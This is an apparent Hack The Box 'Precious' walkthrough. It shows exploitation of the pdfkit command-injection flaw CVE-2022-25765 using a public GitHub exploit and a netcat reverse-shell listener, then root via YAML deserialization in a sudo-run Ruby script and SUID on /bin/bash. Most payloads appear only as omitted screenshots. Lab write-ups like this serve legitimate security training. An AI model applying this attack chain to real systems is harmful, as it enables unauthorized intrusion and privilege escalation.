htb_precious

information gathering

use nmap to discover open-ports and services:

Now we focus on its http service on port 80.

Access it by firefox browser(remember to modify your /etc/hosts):

It seems that this website would help us convert web page to a pdf file. I tried aaa in the search bar:

I was reminded to provide a valid url. Naturally i think of starting a http-server on my kali and then entering my server address :

As excepted, a pdf was downloaded to my own machine. We can obviously find some familiar files by clicking it.

At this time all i can access is a pdf , as a result i use exiftool to analyse it.

What inspires me is pdfkit v0.8.6. I tried searchsploit subconsciously but found nothing:

Then i turned to google , finding a command injection vulnerability:

After trying several pocs, i found a python exp[nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com)^[1]]:

step 1:

starting a python simple http-server:

step 2:

nc:

step 3:

python CVE-2022-25765.py -t target -a localhost -p localport:

foothold

now we got a shell after exploit:

By following below steps , i finally access a fully interactive shell:

1.open a bash terminal2.nc -nlvp 44443.ctrl+z to background the job4.stty -echo raw5.fg

I found a secret directory in home path after looking around:

su henry:

user.txt lies in /home/henry .

privilege escalation

The last step is privilege escalation.

At first , i tried the most simple but effective way:

It appears that henry can run the file update_depencies.rb as root. Use cat to take a look at the file:

I'm stuck with YAML.load , it appears to be vulnerable to a deserialization attack.

Notice that the rb load a file named dependencies.yml. I download malicious yml from google to vefity the vul.

sudo /usr/bin/ruby /opt/update_dependencies.rb:

It works!

Try to add suid to /bin/bash:

exploit:

/bin/bash -p:

References

[1] nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com): https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765

原文始发于微信公众号（Crush Sec）：htb_precious